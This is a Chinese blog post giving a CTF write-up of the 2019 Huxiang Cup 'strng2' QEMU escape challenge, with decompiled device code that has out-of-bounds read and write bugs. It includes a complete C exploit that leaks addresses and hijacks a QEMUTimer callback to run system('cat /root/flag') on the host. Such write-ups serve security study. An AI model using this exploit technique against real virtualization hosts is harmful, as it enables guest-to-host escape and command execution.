2019 湖湘杯 pwn strng2

最新推荐文章于 2022-04-10 12:24:26 发布
最新推荐文章于 2022-04-10 12:24:26 发布
阅读量707 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/122888903
版权

稍做记录

uint64_t __cdecl strng_mmio_read(struct STRNGState *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax

  if ( size != 4 || addr & 3 )
    result = -1LL;
  else
    result = opaque->regs[addr>>2]; //oob read
  return result;
}

void __cdecl strng_pmio_write(struct STRNGState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  int64_t v4; // rax
  uint32_t saddr; // [rsp+24h] [rbp-Ch]

  if ( size == 4 )
  {
    if ( addr )
    {
      if ( addr == 4 && !(opaque->addr & 3) )
      {
        saddr = opaque->addr >> 2;
        if ( saddr == 1 )
        {
          opaque->regs[1] = rand();
        }
        else if ( saddr < 1 )
        {
          srand(val);
        }
        else if ( saddr == 3 )
        {
          opaque->regs[3] = rand_r(&opaque->regs[2]);
        }
        else
        {
          opaque->regs[saddr] = val; // oob write
          if ( opaque->flag )
          {
            v4 = qemu_clock_get_ms_4(QEMU_CLOCK_VIRTUAL_0);
            timer_mod(&opaque->strng_timer, v4 + 100);
          }
        }
      }
    }
    else
    {
      opaque->addr = val;
    }
  }
}

漏洞在mmio_read与mmio_write
一个越界读,一个越界写。

漏洞的利用思路
要利用strngdata结构体

00000000 STRNGState      struc ; (sizeof=0xC30, align=0x10, copyof_1437)
00000000 pdev            PCIDevice_0 ?
000008F0 mmio            MemoryRegion_0 ?
000009F0 pmio            MemoryRegion_0 ?
00000AF0 addr            dd ?
00000AF4 flag            dd ?
00000AF8 regs            dd 64 dup(?)
00000BF8 strng_timer     QEMUTimer_0 ?
00000C28                 db ? ; undefined
00000C29                 db ? ; undefined
00000C2A                 db ? ; undefined
00000C2B                 db ? ; undefined
00000C2C                 db ? ; undefined
00000C2D                 db ? ; undefined
00000C2E                 db ? ; undefined
00000C2F                 db ? ; undefined
00000C30 STRNGState      ends

00000000 QEMUTimer_0     struc ; (sizeof=0x30, align=0x8, copyof_506)
00000000                                         ; XREF: IscsiTask/r
00000000                                         ; STRNGState/r
00000000 expire_time     dq ?
00000008 timer_list      dq ?                    ; offset
00000010 cb              dq ?                    ; offset
00000018 opaque          dq ?                    ; offset
00000020 next            dq ?                    ; offset
00000028 scale           dd ?
0000002C                 db ? ; undefined
0000002D                 db ? ; undefined
0000002E                 db ? ; undefined
0000002F                 db ? ; undefined
00000030 QEMUTimer_0     ends

结构体最后一项qemutimer结构体里面很多指针,我们可以泄露基地址。
然后劫持cb函数指针,system的plt地址整上即可。
这都是常规思路了
在之前的vexx等等中都有提及。

exp

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>

#define MMIO_FILE "/sys/devices/pci0000:00/0000:00:04.0/resource0"
#define PMIO_BASE 0xc050
char* MMIO_BASE;

void die(char* msg){
    perror(msg);
    exit(-1);
}

void init_io(){
    int mmio_fd = open(MMIO_FILE, O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("open mmio file error");
    MMIO_BASE = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (MMIO_BASE == MAP_FAILED)
        die("mmap mmio file failed");
    if (iopl(3) != 0)
        die("io permission requeset failed");
}

uint32_t pmio_read(uint32_t offset){
    return (uint32_t)inl(PMIO_BASE + offset);
}

void pmio_write(uint32_t offset, uint32_t val){
    outl(val, PMIO_BASE + offset);
}

uint32_t mmio_read(uint32_t offset){
    return *(uint32_t *)(MMIO_BASE + offset);
}

void mmio_write(uint32_t offset, uint32_t val){
    *(uint32_t *)(MMIO_BASE + offset) = val;
}

uint32_t pmio_oob_read(uint32_t offset) {
    pmio_write(0, offset);
    return pmio_read(4);
}

void pmio_oob_write(uint32_t offset, uint32_t val){
    pmio_write(0, offset);
    pmio_write(4, val);
}
/*
cat /root/flag 
0x20746163
0x6f6f722f
0x6c662f74
0x00006761
*/

int main(int argc, char **argv){
    uint64_t elf_base, state_addr, libc_base, system_addr;
    uint32_t reg_offset = 0xaf8;
    init_io();

    mmio_write(0x10, 0x20746163);
    mmio_write(0x14, 0x6f6f722f);
    mmio_write(0x18, 0x6c662f74);
    mmio_write(0x1c, 0x00006761);
    elf_base = pmio_oob_read(0xc0c-reg_offset);
    elf_base <<= 32;
    elf_base |= pmio_oob_read(0xc08-reg_offset);
    elf_base -= 0x29ac8e;
    printf("elf_base : %#llxn", elf_base);

    state_addr = pmio_oob_read(0xc14-reg_offset);
    state_addr <<= 32;
    state_addr |= pmio_oob_read(0xc10-reg_offset);
    printf("state_addr : %#llxn", state_addr);

    libc_base = pmio_oob_read(0x7698+4-reg_offset);
    libc_base <<= 32;
    libc_base |= pmio_oob_read(0x7698-reg_offset);
    libc_base -= 0x3c4b78;
    printf("libc_base : %#llxn", libc_base);
    system_addr = libc_base+0x45390;

    // overwrite cb function ptr
    pmio_oob_write(0xc0c-reg_offset, (uint32_t)(system_addr>>32));
    pmio_oob_write(0xc08-reg_offset, (uint32_t)(system_addr&0xffffffff));

    // overwrite function's argument
    pmio_oob_write(0xc14-reg_offset, (uint32_t)((state_addr+0xb08) >> 32));
    pmio_oob_write(0xc10-reg_offset, (uint32_t)((state_addr+0xb08) & (0xffffffff)));

    // trigger timer -> call-back function
    mmio_write(0x20, 0);
    pmio_oob_write(0, 0);

    sleep(1);

    return 0;

}

代码是嫖的pu1p大佬的
泄露了libc,但是其实没必要啦。

yongbaoii
关注
专栏目录
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
2017湖湘pwn200
12-02
【标题】"2017湖湘pwn200"是一个网络安全竞赛中的挑战项目,专注于Pwn(破解)类别。在这个挑战中,参赛者需要利用编程和安全漏洞的知识来解决问题,通常涉及缓冲区溢出、格式字符串漏洞、堆溢出等攻击技术。这个...
2019湖湘部分WP
蚁景网安学院
11-12 1022
0x01 untar直接访问题目可以看到源码<?php $sandbox = "sandbox/" . md5($_SERVER["REMOTE_A...
2019 湖湘 HackNote 经验总结
qq_43189757的博客
11-11 961
静态链接的题目, 又学到了一点 程序保护: 保护全关 程序逻辑分析: 通过观察start 的汇编代码找到main函数的地址 箭头
2019湖湘misc3
hhh
11-12 825
生气 https://blog.csdn.net/weixin_43877387/article/details/103000522?utm_source=app
huxiangbei_2019_namesystem
seaaseesa的博客
04-30 542
huxiangbei_2019_namesystem 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 在delete功能里,如果当v1为18的时候,19处的指针就不会被覆盖,此后18和19指向的是同一个堆,因此存在double free漏洞。 #coding:utf8 from pwn import * #sh = process('./huxiangbei_2019...
2020 湖湘 PWN WriteUp
SkYe's Blog
11-11 730
比赛的时候出去玩了,这就来复盘 babyheap 基本情况 增删查改,数量限制比较宽松挺大的,大小固定 0xf8 。 漏洞 safe_read 写入大小为 0xf8 会溢出修改下一个 chunk size 最低两位为 \x00 。 char *__fastcall safe_read(char *ptr, int size) { char *result; // rax read(0, ptr, 0xF0uLL); result = &ptr[size]; .
湖湘pwn400的wp
一个码农的笔记
12-09 2034
湖湘pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是: http://download.csdn.net/download/niexinming/10152069 把pwn400直接拖入ida中: main函数: Create Profile函数: Print Profile函数: Update Profile函数: Ex
2017年湖湘复赛 pwn100-writeup
aptx4869_li的博客
12-22 1156
2017年湖湘复赛 pwn100-writeup 这是本人第一次做出来pwn的题可能有些地方显得比较笨,但尽量把自己所想的每一步都描述清楚。不足之处请批评指正。
2017湖湘pwn400
12-09
2017湖湘pwn400的pwn题目,喜欢的就下载下来做一下。。
2017湖湘pwn300
12-03
2017湖湘pwn300的题目,请大家自行下载。。。。。。
2020年第六届“湖湘网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
【标题】: 2020年第六届“湖湘网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 【描述】: 这个压缩包文件包含了2020年第六届“湖湘网络安全技能大赛洞庭决赛中,互联网选拔赛第二场的线上CTF...
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8319
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7026
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 5892
尝试过很多解决方案之后无果 决定研究一下它的整个流程
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 5640
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
linux 安装codeql环境 (一)基本环境搭建
yongbaoii的博客
04-10 5154
cccccccodeql
PWN 更换目标程序libc
yongbaoii的博客
12-29 4835
网上这方面我感觉还是比较少的,在这里把我的方法拿出来防止大家踩坑。 这一块知识不大懂的推荐去看《程序员的自我修养》第八章共享库那一章节。 我们换libc的原因是在调试程序的时候我们本地的libc可能跟远程计算机上的libc不一样,不是可能,基本上都不一样,那么我们程序加载libc之后里面的一些函数的偏移地址就会跟我们想的不一样,从而导致脚本不停出错。那么就需要我们去把程序所链接的libc从本地libc更换成远程服务器上的libc。 原理简单的说就是用patchelf把程序依赖libc的那个软连接改一下,或者
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值